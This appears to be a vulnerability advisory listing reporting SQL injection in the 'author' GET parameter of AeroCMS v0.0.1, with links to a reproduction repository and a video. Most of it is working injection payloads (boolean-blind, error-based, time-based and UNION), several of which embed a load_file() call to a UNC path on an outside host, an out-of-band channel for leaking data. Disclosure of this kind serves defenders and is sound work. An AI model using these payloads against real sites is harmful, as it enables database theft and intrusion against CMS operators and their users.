AeroCMS 0.0.1 SQL Injection

🗓️ 29 Aug 2022 00:00:00Reported by nu11secur1tyType

packetstorm🔗 packetstormsecurity.com👁 361 Views

AeroCMS-v0.0.1 SQL injection vulnerability in the `author` parameter allows database thef

`## Title: AeroCMS-v0.0.1 SQLi  
## Author: nu11secur1ty  
## Date: 08.27.2022  
## Vendor: https://github.com/MegaTKC  
## Software: https://github.com/MegaTKC/AeroCMS/releases/tag/v0.0.1  
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/MegaTKC/2021/AeroCMS-v0.0.1-SQLi  
  
## Description:  
The `author` parameter from the AeroCMS-v0.0.1 CMS system appears to  
be vulnerable to SQL injection attacks.  
The malicious user can dump-steal the database, from this CMS system  
and he can use it for very malicious purposes.  
  
STATUS: HIGH Vulnerability  
  
[+]Payload:  
```mysql  
---  
Parameter: author (GET)  
Type: boolean-based blind  
Title: OR boolean-based blind - WHERE or HAVING clause  
Payload: author=-5045' OR 8646=8646 AND 'YeVm'='YeVm&p_id=4  
  
Type: error-based  
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or  
GROUP BY clause (FLOOR)  
Payload: author=admin'+(select  
load_file('\\\\7z7rajg38ugkp9dswbo345g0nrtkha518pzcp0e.kufar.com\\pvq'))+''  
OR (SELECT 7539 FROM(SELECT COUNT(*),CONCAT(0x717a6a6a71,(SELECT  
(ELT(7539=7539,1))),0x7170716b71,FLOOR(RAND(0)*2))x FROM  
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'mwLN'='mwLN&p_id=4  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: author=admin'+(select  
load_file('\\\\7z7rajg38ugkp9dswbo345g0nrtkha518pzcp0e.kufar.com\\pvq'))+''  
AND (SELECT 6824 FROM (SELECT(SLEEP(5)))QfTF) AND 'zVTI'='zVTI&p_id=4  
  
Type: UNION query  
Title: MySQL UNION query (NULL) - 10 columns  
Payload: author=admin'+(select  
load_file('\\\\7z7rajg38ugkp9dswbo345g0nrtkha518pzcp0e.kufar.com\\pvq'))+''  
UNION ALL SELECT  
NULL,NULL,CONCAT(0x717a6a6a71,0x4f617a456c7953617866546b7a666d49434d644662587149734b6d517a4e674d5471615a73616d58,0x7170716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&p_id=4  
---  
  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/MegaTKC/2021/AeroCMS-v0.0.1-SQLi)  
  
## Proof and Exploit:  
[href](https://streamable.com/ir9bjt)  
  
  
`

29 Aug 2022 00:00Current

0.2Low risk

Vulners AI Score0.2